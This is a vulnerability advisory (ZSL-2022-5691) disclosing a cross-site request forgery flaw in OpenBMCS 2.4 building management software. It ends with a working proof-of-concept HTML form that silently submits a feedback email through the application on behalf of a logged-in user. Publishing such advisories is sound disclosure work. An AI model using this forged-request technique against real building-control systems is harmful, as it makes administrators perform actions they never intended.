OpenBMCS 2.4 Cross Site Request Forgery

`  
OpenBMCS 2.4 CSRF Send E-mail  
  
  
Vendor: OPEN BMCS  
Product web page: https://www.openbmcs.com  
Affected version: 2.4  
  
Summary: Building Management & Controls System (BMCS). No matter what the  
size of your business, the OpenBMCS software has the ability to expand to  
hundreds of controllers. Our product can control and monitor anything from  
a garage door to a complete campus wide network, with everything you need  
on board.  
  
Desc: The application interface allows users to perform certain actions via  
HTTP requests without performing any validity checks to verify the requests.  
This can be exploited to perform certain actions with administrative privileges  
if a logged-in user visits a malicious web site.  
  
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)  
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)  
Apache/2.4.41 (Ubuntu)  
Apache/2.4.25 (Debian)  
nginx/1.16.1  
PHP/7.4.3  
PHP/7.0.33-0+deb9u9  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5691  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php  
  
  
26.10.2021  
  
--  
  
  
<html>  
<body>  
<form action="https://192.168.1.222/core/sendFeedback.php" method="POST">  
<input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />  
<input type="hidden" name="message" value="Take me to your leader." />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="submit" value="Send" />  
</form>  
</body>  
</html>  
`